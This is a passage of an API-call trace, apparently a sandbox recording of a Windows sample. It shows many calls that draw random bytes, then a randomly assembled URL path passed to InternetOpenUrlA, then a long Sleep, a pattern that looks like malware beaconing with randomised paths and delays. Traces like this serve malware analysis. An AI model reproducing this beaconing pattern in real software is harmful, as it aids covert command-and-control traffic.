pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17869, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a17869) returned 0x0 [0264.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.358] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.358] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.358] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.358] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.358] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.360] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.360] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17899, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a17899) returned 0x0 [0264.360] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.360] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.360] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.366] GetProcessHeap () returned 0x440000 [0264.367] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0264.367] lstrcpyA (in: lpString1=0x473770, lpString2="@x¡\x03" | out: lpString1="@x¡\x03") returned="@x¡\x03" [0264.367] lstrcatA (in: lpString1="@x¡\x03", lpString2="/xVnaeF668Jo9uqruladhsw715uap45sFttzdnGn/4hrwWz37fi5sv6wf0lvatuq9p4Qi1uuY1wck9XpQ4bg4b4y/poe2lk4bkucki63zhgc39vvkCvmi6/" | out: lpString1="@x¡\x03/xVnaeF668Jo9uqruladhsw715uap45sFttzdnGn/4hrwWz37fi5sv6wf0lvatuq9p4Qi1uuY1wck9XpQ4bg4b4y/poe2lk4bkucki63zhgc39vvkCvmi6/") returned="@x¡\x03/xVnaeF668Jo9uqruladhsw715uap45sFttzdnGn/4hrwWz37fi5sv6wf0lvatuq9p4Qi1uuY1wck9XpQ4bg4b4y/poe2lk4bkucki63zhgc39vvkCvmi6/" [0264.367] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0264.367] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="@x¡\x03/xVnaeF668Jo9uqruladhsw715uap45sFttzdnGn/4hrwWz37fi5sv6wf0lvatuq9p4Qi1uuY1wck9XpQ4bg4b4y/poe2lk4bkucki63zhgc39vvkCvmi6/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0264.367] GetProcessHeap () returned 0x440000 [0264.367] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0264.367] GetProcessHeap () returned 0x440000 [0264.367] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17840 | out: hHeap=0x440000) returned 1 [0264.367] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0264.368] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0264.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0264.368] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0264.368] Sleep (dwMilliseconds=0xfea2) [0264.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0264.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.497] GetProcessHeap () returned 0x440000 [0264.497] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0264.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0264.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 